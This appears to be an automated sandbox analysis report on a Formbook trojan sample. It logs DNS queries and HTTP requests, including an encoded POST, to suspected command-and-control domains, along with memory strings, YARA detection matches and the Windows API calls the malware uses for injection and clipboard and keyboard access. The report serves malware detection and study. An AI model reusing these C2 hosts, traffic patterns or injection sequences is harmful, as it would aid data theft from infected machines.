    Accept-Language: en-US,en;q=0.9
    Host: www.dyme.tech
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global trafficHTTP traffic detected: GET /e0nr/?-NnllVvH=K/5K1kUHGJjjXPw2ZEkIjVgmoRaszrgI6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txK3JHWMG30o4pyFBBCDSCP6CBkBrnoqSCbT0=&e6mhx=LZwxPLrhqt_8A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mizuquan.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
            Source: global traffic | DNS traffic detected: DNS query: www.woshop.online
            Source: global traffic | DNS traffic detected: DNS query: www.kxshopmr.store
            Source: global traffic | DNS traffic detected: DNS query: www.elsupertodo.net
            Source: global traffic | DNS traffic detected: DNS query: www.omexai.info
            Source: global traffic | DNS traffic detected: DNS query: www.tekilla.wtf
            Source: global traffic | DNS traffic detected: DNS query: www.bola88site.one
            Source: global traffic | DNS traffic detected: DNS query: www.languagemodel.pro
            Source: global traffic | DNS traffic detected: DNS query: www.kexweb.top
            Source: global traffic | DNS traffic detected: DNS query: www.jobworklanka.online
            Source: global traffic | DNS traffic detected: DNS query: www.dyme.tech
            Source: global traffic | DNS traffic detected: DNS query: www.arlon-commerce.com
            Source: global traffic | DNS traffic detected: DNS query: www.mizuquan.top
            Source: global traffic | DNS traffic detected: DNS query: www.nobartv6.website
            Source: unknown | HTTP traffic detected: POST /7xi5/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Host: www.omexai.info | Origin: http://www.omexai.info | Content-Type: application/x-www-form-urlencoded | Content-Length: 205 | Connection: close | Cache-Control: max-age=0 | Referer: http://www.omexai.info/7xi5/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | Data Ascii: -NnllVvH=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Tue, 08 Oct 2024 14:34:38 GMT | Content-Length: 19 | Connection: close | Data Ascii: 404 page not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Tue, 08 Oct 2024 14:34:41 GMT | Content-Length: 19 | Connection: close | Data Ascii: 404 page not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Tue, 08 Oct 2024 14:34:44 GMT | Content-Length: 19 | Connection: close | Data Ascii: 404 page not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/plain; charset=utf-8 | X-Content-Type-Options: nosniff | Date: Tue, 08 Oct 2024 14:34:46 GMT | Content-Length: 19 | Connection: close | Data Ascii: 404 page not found
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 08 Oct 2024 14:34:52 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 08 Oct 2024 14:34:55 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 08 Oct 2024 14:34:57 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Tue, 08 Oct 2024 14:35:00 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:21 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:24 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:26 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:29 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:34 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:37 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:40 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 08 Oct 2024 14:35:42 GMT | Server: Apache | X-Xss-Protection: 1; mode=block | Referrer-Policy: no-referrer-when-downgrade | X-Content-Type-Options: nosniff | X-Frame-Options: SAMEORIGIN | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 08 Oct 2024 14:36:16 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 08 Oct 2024 14:36:18 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 14:36:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: IqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mizuquan.top
            Source: IqZHJpXEsts.exe, 00000007.00000002.3641350832.000000000522C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mizuquan.top/e0nr/
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000367E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2277485464.000000000855A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.3640439126.00000000047E8000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003458000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.0000000022BA8000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.elsupertodo.net/2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZl
            Source: netbtugc.exe, 00000006.00000002.3641939906.0000000006B30000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640439126.0000000004E30000.00000004.10000000.00040000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3639915615.0000000003AA0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 00000006.00000003.2284082389.000000000857D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

            Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042C063 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03574340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03574650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572D30 NtUnmapViewOfSection
